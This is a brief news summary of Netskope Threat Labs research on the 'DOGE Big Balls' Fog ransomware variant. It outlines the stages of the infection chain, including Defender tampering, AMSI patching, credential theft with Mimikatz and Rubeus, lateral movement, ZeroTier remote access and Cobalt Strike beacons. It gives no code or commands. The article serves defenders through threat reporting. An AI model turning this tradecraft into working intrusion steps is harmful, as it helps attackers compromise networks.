Ddos 
Netskope Threat Labs has recently uncovered a multi-stage infection chain involving custom PowerShell scripts, open-source tools, exploitation of vulnerable drivers, and red team framework payloads, revealing the arsenal of a ransomware operation known as “DOGE Big Balls,” a variant of the Fog ransomware.
The ransomware is named after the Department of Government Efficiency (DOGE) as a provocation, and its payloads contain political statements and provocations, including references to public figures and YouTube videos.
The infection sequence begins with an MSI file named payload.msi, with initial infection likely occurring through phishing emails or exploitation of vulnerable services. The MSI file executes a PowerShell script, which, after decoding, checks for administrator access and creates a link file in the Windows Startup directory to ensure execution upon user login. It also establishes a scheduled task to download and execute a subsequent script.
The stage1.ps1 script downloads and executes multiple files and scripts from a main URL, creating a hidden directory in the Windows Startup folder.
This version attempts to disable Windows Defender protections and establishes persistence via a Registry Run key entry. It downloads and attempts to execute several files, including cwiper.exe, ktool.exe, and others, with later versions delivering the DOGE Big Balls Ransomware.
Scripts like pivot.ps1 and dcstage1.ps1 are used for lateral movement and targeting Domain Controllers, employing tools like Mimikatz and Rubeus to harvest credentials and move across the network. The worm.ps1 script establishes persistence and spreads to other machines, while ztinstall.ps1 installs ZeroTier to provide the attacker with remote access.
The attackers utilize techniques to evade detection, such as bypassing the Antimalware Scan Interface (AMSI) by patching the “AmsiScanBuffer” function. Some scripts also download and execute payloads, such as Cobalt Strike beacons, to maintain access and control over the compromised systems.
Netskope Labs’ investigation revealed frequent updates to payloads and download URLs, with attackers adding scripts to create administrator accounts and ensure continuous execution of malicious payloads.
Related Posts:
- Researchers Uncovers Sophisticated Phishing Campaigns Leveraging Cloudflare Workers
- Microsoft Alerts of Novel SQL Server-Based Lateral Cloud Movement
- Hidden in Plain Sight: Nim Backdoor Lurks, Netskope Exposes Cyber Game
Donate